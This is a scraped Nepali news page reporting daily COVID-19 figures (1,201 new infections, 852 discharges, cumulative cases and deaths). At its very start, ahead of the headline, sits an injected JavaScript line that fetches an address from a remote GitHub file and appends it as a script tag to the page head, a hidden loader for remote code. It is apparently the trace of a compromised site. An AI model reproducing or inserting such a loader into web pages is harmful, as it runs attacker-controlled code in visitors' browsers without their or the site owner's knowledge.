;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); १२०१ जनामा कोरोना संक्रमण पुष्टि, ८५२ जना डिस्चार्ज – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • १२०१ जनामा कोरोना संक्रमण पुष्टि, ८५२ जना डिस्चार्ज
समाचार

१२०१ जनामा कोरोना संक्रमण पुष्टि, ८५२ जना डिस्चार्ज

भदौ २७

काठमाडौं । पछिल्लो २४ घण्टामा १२०१ जनामा कोरोना भाइरस (कोभिड-१९) को संक्रमण पुष्टि भएको छ । देशभरका प्रयोगशालामा १० हजार १७६ नमुना परीक्षण गर्दा उनीहरुमा संक्रमण पुष्टि भएको हो ।

 

यससँगै कुल संक्रमितको संख्या ५३ हजार १२० पुगेको छ । उनीहरुमध्ये ३३६ जनाको मृत्यु भएको छ भने ३७ हजार ५२४ जना संक्रमित मुक्त भएका छन् । पछिल्लो २४ घण्टामा मात्र ८५२ जना डिस्चार्ज भएका छन् । file Photo

फेसबुक प्रतिक्रियाहरु